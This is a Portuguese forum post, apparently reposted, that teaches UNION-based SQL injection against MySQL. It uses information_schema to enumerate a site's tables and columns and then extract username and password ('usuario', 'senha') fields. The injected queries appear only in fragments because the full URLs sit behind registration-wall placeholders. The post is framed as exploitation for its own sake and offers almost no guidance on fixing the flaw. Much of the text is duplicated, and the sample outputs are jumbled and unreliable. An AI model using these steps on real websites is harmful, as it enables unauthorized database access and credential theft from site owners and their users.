Olá amigos,
Fazia um bom tempo que não postava algo de minha autoria,
Então resolvi fazer este video + tutorial sobre Information_Schema.
Para começar ja digo de inicio, você deve ter algum conhecimento em SQL e/ou SQL Injection.
1 – O que é Information_Schema?
In relational databases, the information schema is an ANSI standard set of read-only views which provide information about all of the tables, views, columns, and procedures in a database. It can be used as a source of the info rmation which some databases make available through non-standard commands, such as the SHOW command of MySQL, the DESCRIBE command of Oracle, and the \d command of PostgreSQL.
Retirado de Wikipédia.
Basicamente foi criado para listar tables,views e colunas, mas quando cai em mãos erradas pode revelar praticamente tudo do seu BD para um black hat.
Maldito Information!! Não amigo, o information foi criado para o bem, a vulnerabilidade não está nele ou no mysql, está no seu site que faz com que ele possa ser executado remotamente.
2 – Vulnerabilidade: Como ocorre? Como saber? Como resolver?
A vulnerabilidade se dá por SQL Injection, Aqui no site ja falamos inúmeras vezes como ela ocorre e como resolver, sugiro a você dar uma pesquisada.
Como saber se posso usar information_schema? Esse recurso está presente no Mysql 5+ para ver isso basta usar na query @@version, exemplo:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
e for exibido algo como:
5.0.51a-3ubuntu5.8 você pode usar information, é claro que pode aparecer outras versões, isso é apenas um exemplo, mas de 5 em diante você pode usar.
3 – Explorando
A exploração é bem simples, e faremos consultas nessa ordem:
Achando a Tabela
Digamos que você ja deu Union all select e aparecem no site os numeros 5,6,7.
Deu a seguinte query:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Agora fazemos a procura em information_schema.tables:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... from information_schema.tables
Substituimos a parte que aparece no site por table_name:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... from information_schema.tables
O resultado será uma lista de tabelas, ex:
Pronto já temos as tabelas, agora procure alguma que interesse, como ex: usuarios ou admin e iremos limitar a consulta com where table_name=’nome da tabela’ ou então nem limitar e exibir as colunas de cada tabela, como fiz na video-aula.
Limitando:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 1,2,3,4,column_name,6,7,8,9,10,11 from information_schema.columns where table_name='usuarios' Resultado ser algo como:
Não limitando:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 1,2,3,4,table_name,column_name,7,8,9,10,11 from information_schema.columns
Resultado:
7
6
tabela2
7
6
tabela3
7
6
usuarios
7
coluna
usuarios
7
coluna2
usuarios
7
senha
usuarios
7
usuario
Pronto agora temos Tabela: usuarios, Colunas: coluna,coluna2,usuario,senha.
Só falta pegar os dados dela:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 1,2,3,4,usuario,senha,7,8,9,10,11 from usuarios
Conseguimos.
4 – Video
Fazia um bom tempo que não postava algo de minha autoria,
Então resolvi fazer este video + tutorial sobre Information_Schema.
Para começar ja digo de inicio, você deve ter algum conhecimento em SQL e/ou SQL Injection.
1 – O que é Information_Schema?
In relational databases, the information schema is an ANSI standard set of read-only views which provide information about all of the tables, views, columns, and procedures in a database. It can be used as a source of the info rmation which some databases make available through non-standard commands, such as the SHOW command of MySQL, the DESCRIBE command of Oracle, and the \d command of PostgreSQL.
Retirado de Wikipédia.
Basicamente foi criado para listar tables,views e colunas, mas quando cai em mãos erradas pode revelar praticamente tudo do seu BD para um black hat.
Maldito Information!! Não amigo, o information foi criado para o bem, a vulnerabilidade não está nele ou no mysql, está no seu site que faz com que ele possa ser executado remotamente.
2 – Vulnerabilidade: Como ocorre? Como saber? Como resolver?
A vulnerabilidade se dá por SQL Injection, Aqui no site ja falamos inúmeras vezes como ela ocorre e como resolver, sugiro a você dar uma pesquisada.
Como saber se posso usar information_schema? Esse recurso está presente no Mysql 5+ para ver isso basta usar na query @@version, exemplo:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
e for exibido algo como:
5.0.51a-3ubuntu5.8 você pode usar information, é claro que pode aparecer outras versões, isso é apenas um exemplo, mas de 5 em diante você pode usar.
3 – Explorando
A exploração é bem simples, e faremos consultas nessa ordem:
- 1 – Tabela
- 2 – Coluna
- 3 – Dados da Coluna
Achando a Tabela
Digamos que você ja deu Union all select e aparecem no site os numeros 5,6,7.
Deu a seguinte query:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Agora fazemos a procura em information_schema.tables:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... from information_schema.tables
Substituimos a parte que aparece no site por table_name:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... from information_schema.tables
O resultado será uma lista de tabelas, ex:
tabela
7
6
tabela2
7
6
tabela3
7
6
usuarios
7
6
7
6
tabela2
7
6
tabela3
7
6
usuarios
7
6
Limitando:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 1,2,3,4,column_name,6,7,8,9,10,11 from information_schema.columns where table_name='usuarios' Resultado ser algo como:
coluna
7
6
coluna2
7
6
senha
7
6
usuario
7
6
7
6
coluna2
7
6
senha
7
6
usuario
7
6
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 1,2,3,4,table_name,column_name,7,8,9,10,11 from information_schema.columns
Resultado:
tabela
7
6
tabela2
7
6
tabela3
7
6
usuarios
7
coluna
usuarios
7
coluna2
usuarios
7
senha
usuarios
7
usuario
Só falta pegar os dados dela:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 1,2,3,4,usuario,senha,7,8,9,10,11 from usuarios
Conseguimos.
4 – Video
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Obrigado por lerem mais este tutorial,
Voltem sempre.
Samukt
Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
(recomendamos você ver em 720p Tela Cheia)
Obrigado por lerem mais este tutorial,
Voltem sempre.
Samukt
Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comment